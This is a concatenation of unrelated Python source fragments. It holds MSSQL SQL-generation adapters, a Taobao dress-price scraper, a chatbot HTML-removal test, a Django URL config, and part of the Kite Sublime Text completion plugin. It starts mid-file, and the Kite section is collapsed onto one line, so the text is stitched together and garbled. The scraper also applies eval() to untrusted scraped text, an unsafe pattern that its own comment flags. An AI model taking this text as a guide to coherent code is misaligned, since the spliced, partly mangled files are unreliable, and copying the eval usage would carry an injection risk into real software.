    # Integers get scale 0 rather than the generic (38,19).

    adapt(IntegerDomain, DecimalDomain)

    def __call__(self):
        self.format("CAST({base} AS DECIMAL(38))", base=self.base)


class MSSQLDumpToText(DumpToText):

    def __call__(self):
        self.format("CAST({base} AS VARCHAR(MAX))", base=self.base)


class MSSQLDumpBooleanToText(DumpToText):

    adapt(BooleanDomain, TextDomain)

    def __call__(self):
        if self.base.is_nullable:
            # BUG FIX: this branch used to read `WHEN NOT {base} = 0`,
            # which T-SQL precedence parses as `NOT ({base} = 0)`, i.e.
            # `{base} <> 0` -- the same condition as the first branch --
            # so a false (0) value matched no branch and the CASE
            # produced NULL instead of 'false'.  `NOT {base} <> 0` is
            # true exactly for 0 while still leaving NULL as NULL.
            self.format("(CASE WHEN {base} <> 0 THEN 'true'"
                        " WHEN NOT {base} <> 0 THEN 'false' END)",
                        base=self.base)
        else:
            self.format("(CASE WHEN {base} <> 0 THEN 'true' ELSE 'false' END)",
                        base=self.base)


class MSSQLDumpDateToText(DumpToText):

    adapt(DateDomain, TextDomain)

    def __call__(self):
        # Style 21 is `YYYY-MM-DD hh:mm:ss.mmm`; keep the date part only.
        self.format("SUBSTRING(CONVERT(VARCHAR, {base}, 21), 1, 10)",
                    base=self.base)


class MSSQLDumpTimeToText(DumpToText):

    adapt(TimeDomain, TextDomain)

    def __call__(self):
        # Keep the time-of-day part of the style-21 representation.
        self.format("SUBSTRING(CONVERT(VARCHAR, CAST({base} AS DATETIME), 21),"
                    " 12, 12)", base=self.base)


class MSSQLDumpDateTimeToText(DumpToText):

    adapt(DateTimeDomain, TextDomain)

    def __call__(self):
        self.format("CONVERT(VARCHAR, {base}, 21)", base=self.base)


class MSSQLDumpTextToDate(DumpToDate):

    adapt(TextDomain, DateDomain)

    def __call__(self):
        # Parse, then FLOOR the day-fraction away to strip the time part.
        self.format("CAST(FLOOR(CAST(CAST({base} AS DATETIME) AS FLOAT))"
                    " AS DATETIME)", base=self.base)


class MSSQLDumpDateTimeToDate(DumpToDate):

    adapt(DateTimeDomain, DateDomain)

    def __call__(self):
        self.format("CAST(FLOOR(CAST({base} AS FLOAT)) AS DATETIME)",
                    base=self.base)


class MSSQLDumpTextToTime(DumpToTime):

    adapt(TextDomain, TimeDomain)

    def __call__(self):
        # Anchor on an epoch date so the FLOAT value is a pure day fraction.
        self.format("CAST(CAST('1900-01-01 ' + {base} AS DATETIME) AS FLOAT)",
                    base=self.base)


class MSSQLDumpDateTimeToTime(DumpToTime):

    adapt(DateTimeDomain, TimeDomain)

    def __call__(self):
        self.format("(CAST({base} AS FLOAT) - FLOOR(CAST({base} AS FLOAT)))",
                    base=self.base)


class MSSQLDumpTextToDateTime(DumpToDateTime):

    adapt(TextDomain, DateTimeDomain)

    def __call__(self):
        self.format("CAST({base} AS DATETIME)", base=self.base)


class MSSQLDumpDateToDateTime(DumpToDateTime):

    adapt(DateDomain, DateTimeDomain)

    def __call__(self):
        # Dates are already DATETIME values; nothing to convert.
        self.format("{base}", base=self.base)


class MSSQLDumpIsTotallyEqual(DumpIsTotallyEqual):
    # NULL-safe (in)equality via an explicit three-way CASE.

    def __call__(self):
        self.format("((CASE WHEN ({lop} = {rop}) OR"
                    " ({lop} IS NULL AND {rop} IS NULL)"
                    " THEN 1 ELSE 0 END) {polarity:switch{<>|=}} 0)",
                    self.arguments, self.signature)


class MSSQLDumpRound(DumpRound):

    def __call__(self):
        if isinstance(self.phrase.domain, DecimalDomain):
            self.format("CAST(ROUND({op}, 0) AS DECIMAL(38))",
                        self.arguments)
        else:
            self.format("ROUND({op}, 0)", self.arguments)


class MSSQLDumpRoundTo(DumpRoundTo):

    def __call__(self):
        # With a literal non-negative precision we can pick an exact
        # DECIMAL scale; otherwise fall back to plain ROUND.
        scale = None
        if (isinstance(self.phrase.precision, LiteralPhrase) and
                self.phrase.precision.value is not None):
            scale = self.phrase.precision.value
            if scale < 0:
                scale = 0
        if scale is not None:
            self.format("CAST(ROUND({op}, {precision})"
                        " AS DECIMAL(38,{scale:pass}))",
                        self.arguments, self.signature,
                        scale=unicode(scale))
        else:
            self.format("ROUND({op}, {precision})",
                        self.arguments, self.signature)


class MSSQLDumpTrunc(DumpTrunc):
    # Truncation toward zero: shift by +/-0.5 before ROUND.

    def __call__(self):
        if isinstance(self.phrase.domain, DecimalDomain):
            self.format("CAST(ROUND({op} -"
                        " (CASE WHEN {op} >= 0 THEN 0.5 ELSE -0.5 END), 0)"
                        " AS DECIMAL(38))", self.arguments)
        else:
            self.format("ROUND({op} -"
                        " (CASE WHEN {op} >= 0 THEN 0.5 ELSE -0.5 END), 0)",
                        self.arguments)


class MSSQLDumpTruncTo(DumpTruncTo):

    def __call__(self):
        scale = None
        if (isinstance(self.phrase.precision, LiteralPhrase) and
                self.phrase.precision.value is not None):
            scale = self.phrase.precision.value
            if scale < 0:
                scale = 0
        if scale is not None:
            self.format("CAST(ROUND({op} -"
                        " (CASE WHEN {op} >= 0 THEN 0.5 ELSE -0.5 END) /"
                        " CAST(POWER(10e0, {precision}) AS DECIMAL(38,19)),"
                        " {precision})"
                        " AS DECIMAL(38,{scale:pass}))",
                        self.arguments, self.signature,
                        scale=unicode(scale))
        else:
            self.format("ROUND({op} -"
                        " (CASE WHEN {op} >= 0 THEN 0.5 ELSE -0.5 END) /"
                        " CAST(POWER(10e0, {precision}) AS DECIMAL(38,19)),"
                        " {precision})",
                        self.arguments, self.signature)


class MSSQLDumpLength(DumpLength):

    template = "LEN({op})"


class MSSQLDumpConcatenate(DumpConcatenate):

    template = "({lop} + {rop})"


class MSSQLDumpSubstring(DumpSubstring):

    def __call__(self):
        # SUBSTRING requires an explicit length; use LEN({op}) when the
        # caller did not provide one.
        if self.phrase.length is None:
            self.format("SUBSTRING({op}, {start}, LEN({op}))", self.phrase)
        else:
            self.format("SUBSTRING({op}, {start}, {length})", self.phrase)


class MSSQLDumpTrim(DumpTrim):

    def __call__(self):
        if self.signature.is_left and not self.signature.is_right:
            self.format("LTRIM({op})", self.arguments)
        elif not self.signature.is_left and self.signature.is_right:
            self.format("RTRIM({op})", self.arguments)
        else:
            self.format("LTRIM(RTRIM({op}))", self.arguments)


class MSSQLDumpToday(DumpToday):

    # GETDATE() with the day-fraction floored away.
    template = "CAST(FLOOR(CAST(GETDATE() AS FLOAT)) AS DATETIME)"


class MSSQLDumpNow(DumpNow):

    template = "GETDATE()"


class MSSQLDumpExtractYear(DumpExtractYear):

    template = "DATEPART(YEAR, {op})"


class MSSQLDumpExtractMonth(DumpExtractMonth):

    template = "DATEPART(MONTH, {op})"


class MSSQLDumpExtractDay(DumpExtractDay):

    template = "DATEPART(DAY, {op})"


class MSSQLDumpExtractHour(DumpExtractHour):

    template = "DATEPART(HOUR, {op})"


class MSSQLDumpExtractMinute(DumpExtractMinute):

    template = "DATEPART(MINUTE, {op})"


class MSSQLDumpExtractSecond(DumpExtractSecond):

    # Seconds plus fractional milliseconds.
    template = ("(DATEPART(SECOND, {op}) +"
                " DATEPART(MILLISECOND, {op}) / 1000e0)")


class MSSQLDumpMakeDate(DumpMakeDate):

    # Build a date by offsetting from a fixed anchor date.
    template = ("DATEADD(DAY, {day} - 1,"
                " DATEADD(MONTH, {month} - 1,"
                " DATEADD(YEAR, {year} - 2001,"
                " CAST('2001-01-01' AS DATETIME))))")


class MSSQLDumpMakeDateTime(DumpMakeDateTime):

    def __call__(self):
        # Start from the date template and wrap a DATEADD for each
        # time component that was supplied.
        template = ("DATEADD(DAY, {day} - 1,"
                    " DATEADD(MONTH, {month} - 1,"
                    " DATEADD(YEAR, {year} - 2001,"
                    " CAST('2001-01-01' AS DATETIME))))")
        if self.phrase.hour is not None:
            template = "DATEADD(HOUR, {hour}, %s)" % template
        if self.phrase.minute is not None:
            template = "DATEADD(MINUTE, {minute}, %s)" % template
        if self.phrase.second is not None:
            template = "DATEADD(MILLISECOND, 1000 * {second}, %s)" % template
        self.format(template, self.arguments)


class MSSQLDumpDateIncrement(DumpDateIncrement):

    template = "({lop} + {rop})"


class MSSQLDumpDateTimeIncrement(DumpDateTimeIncrement):

    template = "({lop} + {rop})"


class MSSQLDumpDateDecrement(DumpDateDecrement):

    template = "({lop} - {rop})"


class MSSQLDumpDateTimeDecrement(DumpDateTimeDecrement):

    template = "({lop} - {rop})"


class MSSQLDumpDateDifference(DumpDateDifference):

    template = "DATEDIFF(DAY, {rop}, {lop})"
import re
import requests
from bs4 import BeautifulSoup
import pandas as pd
import numpy as np


def getHTMLText(url):
    """Fetch *url*, cache the body to web.html, and return the text.

    Returns '' on any failure (network error, non-2xx status).
    """
    try:
        header = {"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"}
        r = requests.get(url, timeout = 20, headers = header)
        print(r.status_code)
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        # BUG FIX: the original called `f.close` without parentheses (a
        # no-op attribute access); the `with` block closes the file.
        with open('web.html', 'w') as f:
            f.write(r.text)
        return r.text
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed.
        print("Failed on fetch: " + url)
        return ""


def parsePage(ilt, html):
    """Append [price, title] pairs scraped from the raw JSON-ish page text."""
    try:
        plt = re.findall(r'\"view_price\"\:\"[\d\.]*\"', html)
        tlt = re.findall(r'\"raw_title\"\:\".*?\"', html)
        for i in range(len(plt)):
            # SECURITY NOTE: eval() is used here only to unquote the matched
            # string literals from scraped (untrusted) page content.  The
            # regexes constrain the input, but ast.literal_eval would be the
            # safer choice.
            price = eval(plt[i].split(':')[1])
            title = eval(tlt[i].split(':')[1])
            ilt.append([price, title])
    except Exception:
        print("failed to parse")


def parsePage_soup(html):
    """Parse the item list with BeautifulSoup.

    Returns a dict with parallel 'price', 'name' and 'url' lists suitable
    for building a DataFrame.
    """
    soup = BeautifulSoup(html, "html.parser")
    items = soup.find('div', class_ = "m-itemlist")
    item_list = items.find_all('div', class_ = "item")
    price_list = []
    name_list = []
    url_list = []
    for item in item_list:
        p = item.find('div', class_ = "price g_price g_price-highlight")
        price = p.strong.string.replace('\n', '')
        price = price.replace(' ', '')
        # Currency symbol lives in the <span>, amount in the <strong>.
        price_list.append(p.span.string + price)
        text_temp = item.find('div', class_ = 'ctx-box J_MouseEneterLeave J_IconMoreNew')
        u = text_temp.find('a', class_ = "J_ClickStat")
        url_list.append(u['href'])
        # BUG FIX: the loop variable was named `str`, shadowing the builtin.
        name = ""
        for frag in u.strings:
            name = name + frag
        name = name.replace('\n', '')
        name = name.replace(' ', '')
        name_list.append(name)
    ilt = {'price': price_list, 'name': name_list, 'url' : url_list}
    return ilt


def printGoodsList(ilt):
    """Pretty-print a list of [price, title] rows with a running index."""
    tplt = "{:4}\t{:8}\t{:16}"
    print(tplt.format("序号", "价格¥", "商品名称"))
    count = 0
    for g in ilt:
        count = count + 1
        print(tplt.format(count, g[0], g[1]))


def saveGoodsList(ilt):
    """Dump the scraped data to a CSV file via pandas."""
    df = pd.DataFrame(ilt)
    df.to_csv("dress_Price_comparsion.csv")


def main():
    goods = '裙子'
    depth = 2   # pages to be scratch
    start_url = 'https://s.taobao.com/search?q='+goods
    infoList = []
    # for i in range(depth):
    #     try:
    #         url = start_url + "&s=" + str(44*i)
    #         html = getHTMLText(url)
    #         parsePage_soup(infoList, html)
    #     except:
    #         print('Failed, url: ' + start_url + "&s=" + str(44*i))
    #         continue
    # BUG FIX: the original also called f.close() (redundant inside `with`)
    # and `f.close` elsewhere without parentheses.
    with open("裙子_淘宝搜索.html", 'r') as f:
        html = f.read()
    info = parsePage_soup(html)
    saveGoodsList(info)
    parsePage(infoList, html)
    printGoodsList(infoList)


if __name__ == "__main__":
    main()
import unittest
import os

from programy.processors.post.removehtml import RemoveHTMLPostProcessor
from programy.bot import Bot
from programy.brain import Brain
from programy.config.sections.brain.brain import BrainConfiguration
from programy.config.sections.bot.bot import BotConfiguration


class RemoveHTMLTests(unittest.TestCase):
    """Tests for RemoveHTMLPostProcessor: plain text passes through and
    ``<br/>`` tags become the platform's native line break."""

    def setUp(self):
        self.bot = Bot(Brain(BrainConfiguration()), config=BotConfiguration())

    def _assert_platform_linebreak(self, result):
        # The processor is expected to turn <br/> into the host OS line
        # break.  Extracted helper: this three-way branch was duplicated
        # verbatim for each <br/> variant in the original test.
        self.assertIsNotNone(result)
        if os.name == 'posix':
            self.assertEqual("Hello\nWorld", result)
        elif os.name == 'nt':
            self.assertEqual("Hello\r\nWorld", result)
        else:
            raise Exception("Unknown os [%s]"%os.name)

    def test_remove_html(self):
        processor = RemoveHTMLPostProcessor()

        # Text without markup is returned unchanged.
        result = processor.process(self.bot, "testid", "Hello World")
        self.assertIsNotNone(result)
        self.assertEqual("Hello World", result)

        # <br/> without and with a space before the slash.
        self._assert_platform_linebreak(
            processor.process(self.bot, "testid", "Hello <br/> World"))
        self._assert_platform_linebreak(
            processor.process(self.bot, "testid", "Hello <br /> World"))
from django.urls import path

from . import views

# URL routes for the projects app.
urlpatterns = [
    # App landing page: list of all projects.
    path('', views.home, name="projects"),
    # Detail page for a single project, addressed by its primary key
    # (captured as a string and passed to the view as `pk`).
    path('project/<str:pk>/', views.project, name="project"),
]
import sublime import sublime_plugin import hashlib import htmlmin import json import sys from http.client import CannotSendRequest from jinja2 import Template from os.path import realpath from threading import Lock from urllib.parse import quote from ..lib import deferred, keymap, link_opener, logger, settings, requests, languages from ..lib.errors import ExpectedError from ..lib.file_system import path_for_url from ..setup import is_development, os_version, package_version MAX_FILE_SIZE = 1048576 # 1 MB default __all__ = [ 'EventDispatcher', 'CompletionsHandler', 'SignaturesHandler', 'HoverHandler', 'StatusHandler', 'MaxFileSizeUpdater', ] def _is_view_supported(view): return view.file_name() is not None and any( view.file_name().endswith(ext) for ext in languages.SUPPORTED_EXTS ) def _check_view_size(view): return view.size() <= MAX_FILE_SIZE def _get_view_substr(view, start, end): return view.substr(sublime.Region(start, end)) def _get_word(view, point): word_region = view.word(point) return _get_view_substr(view, word_region.a, word_region.b) def _in_function_call(view, point): # The first matched scope is for 3176, and the second is for 3200. Both # are checked here as a hacky fix to account for changes in the API. We # should instead factor version handling logic into a separate module. 
return ((view.match_selector(point, 'meta.function-call.python') or view.match_selector(point, 'meta.function-call.arguments.python')) and not view.match_selector(point, 'variable.function.python')) def _at_function_call_begin(view, point): return (_in_function_call(view, point) and view.match_selector(point, 'punctuation.section.arguments.begin.python')) def _at_function_call_end(view, point): return (_in_function_call(view, point) and view.match_selector(point, 'punctuation.section.arguments.end.python')) def _in_empty_function_call(view, point): return (_at_function_call_begin(view, point - 1) and _at_function_call_end(view, point)) def _md5(text): return hashlib.md5(str.encode(text)).hexdigest() class EventDispatcher(sublime_plugin.EventListener): """Listener which forwards editor events to the event endpoint and also fetches completions and function signature information when the proper event triggers are fired. """ _last_selection_region = None def on_modified(self, view): self.__class__._handle(view, 'edit') def on_selection_modified(self, view): self.__class__._handle(view, 'selection') @classmethod def _handle(cls, view, action): if not _is_view_supported(view): return # Workaround to handle cloned views # See https://github.com/SublimeTextIssues/Core/issues/289 view = sublime.active_window().active_view() deferred.defer(requests.kited_post, '/clientapi/editor/event', data=cls._event_data(view, action)) if action == 'selection': select_region = cls._view_region(view) cls._last_selection_region = select_region if (select_region is not None and _in_function_call(view, select_region['end'])): if SignaturesHandler.is_activated(): SignaturesHandler.queue_signatures(view, select_region['end']) else: SignaturesHandler.hide_signatures(view) if action == 'edit' and _check_view_size(view): edit_region = cls._view_region(view) edit_type, num_chars = cls._edit_info(cls._last_selection_region, edit_region) if edit_type == 'insertion' and num_chars == 1: if 
view.settings().get('auto_complete'): CompletionsHandler.queue_completions(view, edit_region['end']) elif edit_type == 'deletion' and num_chars > 1: CompletionsHandler.hide_completions(view) if (edit_region is not None and _in_function_call(view, edit_region['end'])): if (settings.get('show_function_signatures', True) or SignaturesHandler.is_activated()): SignaturesHandler.queue_signatures(view, edit_region['end']) else: SignaturesHandler.hide_signatures(view) @staticmethod def _view_region(view): if len(view.sel()) != 1: return None r = view.sel()[0] return { 'file': view.file_name(), 'begin': r.begin(), 'end': r.end(), } @staticmethod def _edit_info(selection, edit): no_info = (None, None) if (selection is None or edit is None or selection['file'] != edit['file']): return no_info if edit['end'] > selection['end']: return 'insertion', edit['end'] - selection['end'] if edit['end'] < selection['end']: return 'deletion', selection['end'] - edit['end'] return no_info @staticmethod def _event_data(view, action): text = view.substr(sublime.Region(0, view.size())) if not _check_view_size(view): action = 'skip' text = '' return { 'source': 'sublime3', 'filename': realpath(view.file_name()), 'text': text, 'action': action, 'selections': [{'start': r.a, 'end': r.b, 'encoding': 'utf-32'} for r in view.sel()], 'editor_version': sublime.version(), 'plugin_version': package_version(), } class CompletionsHandler(sublime_plugin.EventListener): """Listener which handles completions by preemptively forwarding requests to the completions endpoint and then running the Sublime `auto_complete` command. """ _lock = Lock() # The last buffer location at which completions were requested. This value # gets updated on every completions request, regardless of whether or not # a new set of completions are initialized. _last_location = None # The last prefix at which completions were requested. 
This value gets # updated on every completions request, regardless of whether or not a # new set of completions are initialized. _last_prefix = None # The last list of completions that were received from the backend. This # value gets updated on every completions request, regardless of whether # or not a new set of completions are initialized. _last_received_completions = [] # The last character that triggered completions. This value gets updated on # every completions request. _last_trigger_char = None # The last buffer location at which completions were initialized. This # value only gets changed when a new set of completions is sent back to # the UI. _last_init_location = None # The last prefix that was recorded at completions initialization. This # value only gets changed when a new set of completions is sent back to # the UI. _last_init_prefix = None # The last list of completions that were initialized. This value only gets # changed when a new set of completions is sent back to the UI. 
_last_init_completions = [] def on_query_completions(self, view, prefix, locations): # Prevent completions from showing up in non-active views if sublime.active_window().active_view().id() != view.id(): return None cls = self.__class__ if not _is_view_supported(view): return None if not _check_view_size(view): return None if len(locations) != 1: return None with cls._lock: if cls._last_location is None: cls._last_received_completions = [] cls._last_init_completions = [] cls._last_location = None cls.queue_completions(view, locations[0]) return None if (cls._last_location != locations[0] and cls._last_received_completions): logger.debug('completions location mismatch: {} != {}' .format(cls._last_location, locations[0])) cls._clear_cache() completions = None if (cls._last_location == locations[0] and cls._last_received_completions): completions = self._flatten_completions( cls._last_received_completions) cls._last_init_completions = cls._last_received_completions cls._last_init_location = cls._last_location cls._last_init_prefix = prefix return completions def on_post_text_command(self, view, command_name, args): if command_name not in ('prev_field', 'next_field', 'commit_completion', 'insert_best_completion'): return if len(view.sel()) != 1: return cls = self.__class__ region = view.sel()[0] on_placeholder = not region.empty() # we must only show completions if a placeholder was selected # there's no way to be notified when a particular completion item was # inserted # the closest thing we can do is to show completions # only when a non-empty selection (i.e. 
size > 1) is present after the # command was executed if on_placeholder: # a reversed region might have region.a > region.b a, b = sorted([region.a, region.b]) cls.queue_completions(view, [a, b]) if command_name in ('commit_completion', 'insert_best_completion'): if settings.get('replace_text_after_commit_completion', True): cls._process_replace_text(view, region) cls._last_init_completions = [] cls._last_init_prefix = None cls._last_location = None logger.debug('cleared completions') @classmethod def queue_completions(cls, view, location): deferred.defer(cls._request_completions, view, cls._event_data(view, location)) @classmethod def hide_completions(cls, view): with cls._lock: cls._clear_cache() view.run_command('hide_auto_complete') @classmethod def _process_replace_text(cls, view, region): inserted_completion, is_snippet = cls._find_inserted_completion(view) if inserted_completion and not is_snippet: inserted_text = inserted_completion['snippet']['text'] replace_begin = inserted_completion['replace']['begin'] logger.debug('inserted {} / {} -> {}:\n{}' .format(cls._last_init_prefix, cls._last_prefix, inserted_text, cls._completion_str(inserted_completion))) in_buffer = _get_view_substr(view, replace_begin, replace_begin + len(inserted_text)) if inserted_text == in_buffer: cls._process_matched_replace_text(view, region, inserted_completion) else: cls._process_unmatched_replace_text(view, region, inserted_completion) elif inserted_completion and is_snippet: replace = inserted_completion['post_commit']['replace'] view.run_command('kite_view_erase', { 'range': (replace['begin'], replace['end']), }) else: logger.debug('no matching completion') @classmethod def _process_matched_replace_text(cls, view, region, inserted): inserted_text = inserted['snippet']['text'] word_region = view.word(region.b) word = _get_view_substr(view, word_region.a, word_region.b) logger.debug('word: {}, inserted: {}'.format(word, inserted_text)) if word == inserted_text: logger.debug('word 
matches, nothing to do!') return replace_begin = inserted['replace']['begin'] replace_end = inserted['replace']['end'] chars_to_trim = replace_end - replace_begin leftover_chars = chars_to_trim - \ (cls._last_location - cls._last_init_location) - \ len(cls._last_init_prefix) logger.debug('chars to trim: {}, leftover: {}' .format(chars_to_trim, leftover_chars)) if leftover_chars > 0: logger.debug('trimming: {}' .format(_get_view_substr(view, region.b, region.b + leftover_chars))) view.run_command('kite_view_erase', { 'range': (region.b, region.b + leftover_chars), }) @classmethod def _process_unmatched_replace_text(cls, view, region, inserted): inserted_text = inserted['snippet']['text'] replace_begin = inserted['replace']['begin'] replace_end = inserted['replace']['end'] chars_to_trim = replace_end - replace_begin - len(cls._last_prefix) trim_before = (replace_begin, region.b - len(inserted_text)) trimmed = trim_before[1] - trim_before[0] rem_chars = chars_to_trim - trimmed trim_after = (region.b, region.b + rem_chars) logger.debug('trim before {} = {}' .format(trim_before, _get_view_substr(view, trim_before[0], trim_before[1]))) logger.debug('trim after {} = {}' .format(trim_after, _get_view_substr(view, trim_after[0], trim_after[1]))) # This is a hack that handles the situation when dict keys are inserted # from an attribute expression. In this case, the typed out attribute # is already completely replaced by the index expression, so the only # character that needs to be trimmed is the leading ".". before_str = _get_view_substr(view, trim_before[0], trim_before[1]) attr_to_dict_key = (before_str == '.' 
and inserted_text[0] == '[' and inserted_text[-1] == ']') view.run_command('kite_view_erase', {'range': trim_before}) if not attr_to_dict_key: view.run_command('kite_view_erase', { 'range': (trim_after[0] - trimmed, trim_after[1] - trimmed), }) @classmethod def _find_inserted_completion(cls, view): if len(view.sel()) != 1: return None region = view.sel()[0] is_snippet = not region.empty() def _search(_completions): candidates = [] for _c in _completions: text = _c['snippet']['text'] in_buffer = _get_view_substr(view, region.a - len(text), region.a) if in_buffer == text: candidates.append(_c) if 'children' in _c: candidates.extend(_search(_c['children'])) return candidates def _search_snippet(_completions): candidates = [] for _c in _completions: if 'post_commit' not in _c: continue buffer = _c['post_commit']['buffer'] text = buffer['text'] in_buffer = _get_view_substr(view, buffer['start'], buffer['end']) logger.debug('comparing {} to {}'.format(text, in_buffer)) if in_buffer == text: candidates.append(_c) if 'children' in _c: candidates.extend(_search_snippet(_c['children'])) return candidates completions = (_search(cls._last_received_completions) if not is_snippet else _search_snippet(cls._last_received_completions)) logger.debug('possible matched completions: {}' .format(cls._completions_str(completions))) longest = None for i, c in enumerate(completions): if longest is None: longest = c elif len(c['snippet']['text']) > len(longest['snippet']['text']): longest = c return longest, is_snippet @staticmethod def _is_snippets_enabled(): return settings.get('enable_snippets', True) @classmethod def _request_completions(cls, view, data): logger.debug('fetching completions') resp, body = requests.kited_post('/clientapi/editor/complete', data) if resp.status != 200 or not body: logger.debug('no completions!') return resp_data = json.loads(body.decode('utf-8')) completions = resp_data['completions'] or [] logger.debug('received completions: {}' 
            .format(cls._completions_str(completions, display_only=True)))

        with cls._lock:
            cls._last_received_completions = completions
            cls._last_location = data['position']['end']
            cls._augment_completions_replace(view, cls._last_location,
                                             cls._last_received_completions)

        # Setting the last prefix inside the lock seems to hang on Linux and
        # Windows so we do it outside. Using Sublime's view API inside the
        # lock may be the reason.
        cls._last_prefix = _get_word(view, data['position']['end'])
        cls._last_trigger_char = _get_view_substr(view,
                                                  data['position']['end'] - 1,
                                                  data['position']['end'])
        logger.debug('last trigger char: "{}"'.format(cls._last_trigger_char))

        cls._run_auto_complete(view)

    @classmethod
    def _augment_completions_replace(cls, view, position, completions):
        """Attach a 'post_commit' descriptor to completions whose replace
        range starts at or after the cursor, describing how the buffer and
        replace range shift once the snippet text is inserted.
        """
        for c in completions:
            begin = c['replace']['begin']
            end = c['replace']['end']
            text = c['snippet']['text']
            n = len(text)
            # Only completions that replace text ahead of the cursor need
            # post-commit adjustment.
            if begin >= position and end > begin:
                c['post_commit'] = {
                    'replace': {
                        'begin': begin + n,
                        'end': end + n,
                    },
                    'buffer': {
                        'start': position,
                        'end': position + n + end - begin,
                        'text': '{}{}'.format(
                            text, _get_view_substr(view, begin, end)),
                    },
                }

    @classmethod
    def _run_auto_complete(cls, view):
        """Refresh Sublime's completion UI if the newly received completions
        require it; otherwise let Sublime filter the currently shown list.
        """
        # Don't refresh if Kite doesn't have completions. Sublime will
        # filter the completions for us automatically. Note that Sublime
        # performs fuzzy matching so it is possible that Kite will suggest
        # completions that aren't exactly prefix matched.
        with cls._lock:
            if len(cls._last_received_completions) == 0:
                logger.debug('nothing to do: no new completions')
                return

        # It seems like the `auto_complete` command does not always result in
        # `on_query_completions` from being triggered if a completion list is
        # currently shown, so we need to hide it first.
        #
        # However, we only need to refresh the completions UI if the incoming
        # completions contain any completions that were not in the previous
        # list. Otherwise, Sublime will filter the UI automatically.
        #
        # We also need to force the completions UI to show when the user
        # types a space, because Sublime will hide the completions otherwise.
        #
        # NOTE(review): _is_completions_subset acquires cls._lock itself, so
        # it must stay outside the `with` block above (Lock is not reentrant).
        if not cls._is_completions_subset() or cls._last_trigger_char == ' ':
            view.run_command('hide_auto_complete')
            view.run_command('auto_complete', {
                'api_completions_only': True,
                'disable_auto_insert': True,
                'next_completion_if_showing': False,
            })
        else:
            logger.debug('nothing to do: completions are subset')

    @classmethod
    def _is_completions_subset(cls):
        """Return True if every newly received completion was already present
        in the completions shown at the start of the current word.
        """
        with cls._lock:
            # both sets of completions are in the Kite's original data format
            previous = cls._flatten_completions(cls._last_init_completions)
            current = cls._flatten_completions(cls._last_received_completions)

            # A longer current list necessarily contains new items.
            if len(previous) == 0 or len(current) > len(previous):
                return False

            for index, item in enumerate(current):
                if not any((cls._completions_equal(item, prev_item)
                            for prev_item in previous)):
                    return False

            return True

    @classmethod
    def _clear_cache(cls):
        """Reset all cached completion state to its initial values."""
        cls._last_location = None
        cls._last_prefix = None
        cls._last_trigger_char = None
        cls._last_received_completions = []
        cls._last_init_location = None
        cls._last_init_prefix = None
        cls._last_init_completions = []

    @staticmethod
    def _completions_equal(lhs, rhs):
        """Compare two flattened (display, insert-text) completion tuples."""
        return lhs[0] == rhs[0] and lhs[1] == rhs[1]

    @classmethod
    def _flatten_completions(cls, completions, nesting=0):
        """Recursively flatten a completion tree into a list of
        (branded display, insert text) tuples.
        """
        if not completions:
            return []

        result = []
        for c in completions:
            # We were previously using _is_snippets_enabled to branch on old/new
            # logic, but it appears that sometimes this check fails so we need
            # handle each completion item individually.
            #
            # See: https://rollbar.com/Kite/sublime-prod/items/14275/
            if 'snippet' not in c:
                # Old-style completion: plain insert text.
                result.append((
                    cls._brand_completion(c['display'], c['hint']),
                    c['insert']
                ))
            else:
                # New-style completion: render snippet placeholders.
                result.append((cls._brand_completion(c['display'], c['hint']),
                               cls._placeholder_text(c)))
            if 'children' in c:
                result.extend(cls._flatten_completions(c['children'],
                                                       nesting + 1))
        return result

    @staticmethod
    def _placeholder_text(completion):
        """Convert a Kite snippet into Sublime snippet syntax by wrapping each
        placeholder span as ``${index:original}``. Falls back to the raw
        snippet text if the placeholder data is missing.
        """
        text = completion['snippet']['text']
        try:
            placeholders = completion['snippet']['placeholders'] or []
            # sort placeholders in reverse order for easier string patching
            # we assume that placeholders do not overlap
            copy = sorted(placeholders, key=lambda i: i['begin'], reverse=True)
            for p in copy:
                a, b = p['begin'], p['end']
                # +1 because $0 is the last placeholder
                index = placeholders.index(p) + 1
                text = text[:a] + "${{{}:{}}}".format(index, text[a:b]) \
                       + text[b:]
        except KeyError:
            return completion['snippet']['text']
        return text

    @staticmethod
    def _brand_completion(symbol, hint=None):
        """Format a completion row with an optional hint and the Kite mark."""
        return ('{}\t{} ⟠'.format(symbol, hint) if hint
                else '{}\t⟠'.format(symbol))

    @classmethod
    def _event_data(cls, view, location):
        """Build the request payload for the new completions endpoint.

        ``location`` may be an int offset or a [begin, end] pair.
        """
        if isinstance(location, list):
            a, b = location[0], location[1]
        else:
            a, b = location, location

        return {
            'filename': realpath(view.file_name()),
            'editor': 'sublime3',
            'text': view.substr(sublime.Region(0, view.size())),
            'offset_encoding': 'utf-32',
            'position': {
                'begin': a,
                'end': b,
            },
            'no_snippets': not cls._is_snippets_enabled(),
        }

    @staticmethod
    def _event_data_old(view, location):
        """Build the request payload for the legacy completions endpoint."""
        return {
            'filename': realpath(view.file_name()),
            'editor': 'sublime3',
            'text': view.substr(sublime.Region(0, view.size())),
            'cursor_runes': location,
        }

    @staticmethod
    def _prune_completion(completion, display_only=False):
        """Reduce a completion dict to the fields useful for logging."""
        if not display_only:
            fields = ('snippet', 'replace', 'display', 'post_commit')
            return {k: completion.get(k, None) for k in fields}
        else:
            return completion.get('display', None)

    @classmethod
    def _completions_str(cls, completions, display_only=False):
        """Return a JSON log string for a (possibly nested) completion list."""
        def _help(completions, nesting=0):
            if not completions:
                return []

            result = []
            for c in completions:
                # We were previously using _is_snippets_enabled to branch on
                # old/new logic, but it appears that sometimes this check fails
                # so we need handle each completion item individually.
                #
                # See: https://rollbar.com/Kite/sublime-prod/items/14275/
                if 'snippet' not in c:
                    result.append(cls._prune_completion(c, display_only))
                else:
                    result.append(cls._prune_completion(c, display_only))
                if 'children' in c:
                    result.extend(_help(c['children'], nesting + 1))
            return result

        return logger.jsonstr(_help(completions))

    @classmethod
    def _completion_str(cls, completion):
        """Return a JSON log string for a single completion."""
        return logger.jsonstr(cls._prune_completion(completion))


class SignaturesHandler(sublime_plugin.EventListener):
    """Listener which handles signatures by sending requests to the signatures
    endpoint and rendering the returned data.
    """

    # Whether a signature popup is currently being shown.
    _activated = False
    # View and call data backing the currently shown popup.
    _view = None
    _call = None
    _lock = Lock()

